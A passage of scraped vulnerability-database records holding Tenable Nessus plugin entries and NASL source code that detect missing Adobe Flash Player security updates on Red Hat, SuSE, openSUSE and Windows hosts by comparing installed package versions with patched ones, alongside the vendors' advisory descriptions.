(CVE-2014-0504)\n\nAll users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 11.2.202.346.", "cvss3": {}, "published": "2014-03-13T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2014:0289)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.5"], "id": "REDHAT-RHSA-2014-0289.NASL", "href": "https://www.tenable.com/plugins/nessus/72976", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0289. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72976);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(66122, 66127);\n script_xref(name:\"RHSA\", value:\"2014:0289\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2014:0289)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes two security issues\nis now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes two vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security bulletin APSB14-08,\nlisted in the References section.\n\nA vulnerability was reported that could be used to bypass the same\norigin policy. (CVE-2014-0503)\n\nA vulnerability was reported that could be used to read the contents\nof the clipboard. (CVE-2014-0504)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.346.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-08.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0289\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0504\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0503\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0289\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.346-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.346-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. 
This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:39", "description": "Adobe Flash Player was updated to version 11.2.202.346 to fix security issues :\n\n - A vulnerability that could be used to bypass the same origin policy was fixed. (CVE-2014-0503)\n\n - A vulnerability that could be used to read the contents of the clipboard was fixed. More information can be found on:\n http://helpx.adobe.com/security/products/flash-player/apsb14-08.html. (CVE-2014-0504)", "cvss3": {}, "published": "2014-03-18T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 9012)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player", "p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_FLASH-PLAYER-140313.NASL", "href": "https://www.tenable.com/plugins/nessus/73075", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73075);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 9012)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 11.2.202.346 to fix security\nissues :\n\n - A vulnerability that could be used to bypass the same\n origin policy was fixed. (CVE-2014-0503)\n\n - A vulnerability that could be used to read the contents\n of the clipboard was fixed. More information can be\n found on:\n http://helpx.adobe.com/security/products/flash-player/ap\n sb14-08.html. 
(CVE-2014-0504)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=867808\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0503.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0504.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9012.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.346-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.346-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.346-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.346-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.346-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.346-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:22:51", "description": "According to its 
version, the instance of Flash Player installed on the remote Windows host is equal or prior to 11.7.700.269 / 11.8.x / 11.9.x / 12.0.0.70. It is, therefore, potentially affected by multiple vulnerabilities :\n\n - A vulnerability exists that could be used to bypass the same origin policy. (CVE-2014-0503)\n\n - A vulnerability exists that could be used to read the contents of the clipboard. (CVE-2014-0504)", "cvss3": {}, "published": "2014-03-11T00:00:00", "type": "nessus", "title": "Flash Player <= 11.7.700.269 / 12.0.0.70 Multiple Vulnerabilities (APSB14-08)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB14-08.NASL", "href": "https://www.tenable.com/plugins/nessus/72937", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72937);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(66122, 66127);\n\n script_name(english:\"Flash Player <= 11.7.700.269 / 12.0.0.70 Multiple Vulnerabilities (APSB14-08)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Windows host is equal or prior to 11.7.700.269 / 11.8.x /\n11.9.x / 12.0.0.70. It is, therefore, potentially affected multiple\nvulnerabilities :\n\n - A vulnerability exists that could be used to bypass the\n same origin policy. (CVE-2014-0503)\n\n - A vulnerability exists that could be used to read the\n contents of the clipboard. 
(CVE-2014-0504)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-08.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.272 / 12.0.0.77 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0503\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\", \"Chrome_Pepper\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n (\n # Chrome Flash <= 12.0.0.70\n variant == \"Chrome_Pepper\" &&\n (iver[0] == 12 && iver[1] == 0 && iver[2] == 0 && iver[3] <= 70)\n ) ||\n (variant != \"Chrome_Pepper\" &&\n (\n # < 11\n iver[0] < 11 ||\n # 11.x <= 11.7.700.269\n (\n iver[0] == 11 &&\n (\n iver[1] < 7 ||\n (\n iver[1] == 7 &&\n (\n iver[2] < 700 ||\n (iver[2] == 700 && iver[3] <= 269)\n )\n )\n )\n ) ||\n # 11.8.x\n (iver[0] == 11 && iver[1] == 8) ||\n # 11.9.x\n (iver[0] == 11 && iver[1] == 9) ||\n\n # 12.0.0.x <= 12.0.0.70\n (\n iver[0] == 12 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 70\n )\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product: Browser Plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == 
\"Chrome_Pepper\")\n info += '\\n Fixed version : 12.0.0.77 (Chrome PepperFlash)';\n else\n {\n if (ver =~ \"^11\\.7\")\n fix = \"11.7.700.272\";\n else\n fix = \"12.0.0.77\";\n info += '\\n Fixed version : '+fix;\n }\n info += '\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_warning(port:port, extra:info);\n else security_warning(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:03", "description": "Adobe Flash Player was updated to version 11.2.202.346 to fix security issues :\n\nCVE-2014-0503: A vulnerability that could be used to bypass the same origin policy was fixed.\n\nCVE-2014-0504: A vulnerability that could be used to read the contents of the clipboard was fixed.\n\nMore information can be found on:\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-08.html", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2014:0377-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0504", "CVE-2014-0503", "CVE-2014-0504"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-212.NASL", "href": "https://www.tenable.com/plugins/nessus/75293", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-212.\n#\n# The text description 
of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75293);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-0504\", \"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(58184, 66122, 66127);\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2014:0377-1)\");\n script_summary(english:\"Check for the openSUSE-2014-212 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 11.2.202.346 to fix security\nissues :\n\nCVE-2014-0503: A vulnerability that could be used to bypass the same\norigin policy was fixed.\n\nCVE-2014-0504: A vulnerability that could be used to read the contents\nof the clipboard was fixed.\n\nMore information can be found on:\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-08.html\"\n );\n # http://helpx.adobe.com/security/products/flash-player/apsb14-08.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-08.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=867808\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-03/msg00042.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-11.2.202.346-2.64.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-gnome-11.2.202.346-2.64.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-kde4-11.2.202.346-2.64.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.346-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.346-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.346-38.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:16:32", "description": "An updated Adobe Flash Player package that fixes 
one security issue is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This vulnerability is detailed in the Adobe Security Bulletin APSB14-13, listed in the References section.\n\nA flaw was found in the way flash-plugin displayed certain SWF content. An attacker could use this flaw to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0515)\n\nAll users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 11.2.202.356.", "cvss3": {}, "published": "2014-04-30T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2014:0447)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.5"], "id": "REDHAT-RHSA-2014-0447.NASL", "href": "https://www.tenable.com/plugins/nessus/73780", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0447. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73780);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0515\");\n script_xref(name:\"RHSA\", value:\"2014:0447\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2014:0447)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes one security issue is\nnow available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\nCritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed in the Adobe Security Bulletin APSB14-13,\nlisted in the References section.\n\nA flaw was found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use this flaw to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially,\nexecute arbitrary code when the victim loaded a page containing the\nmalicious SWF content. 
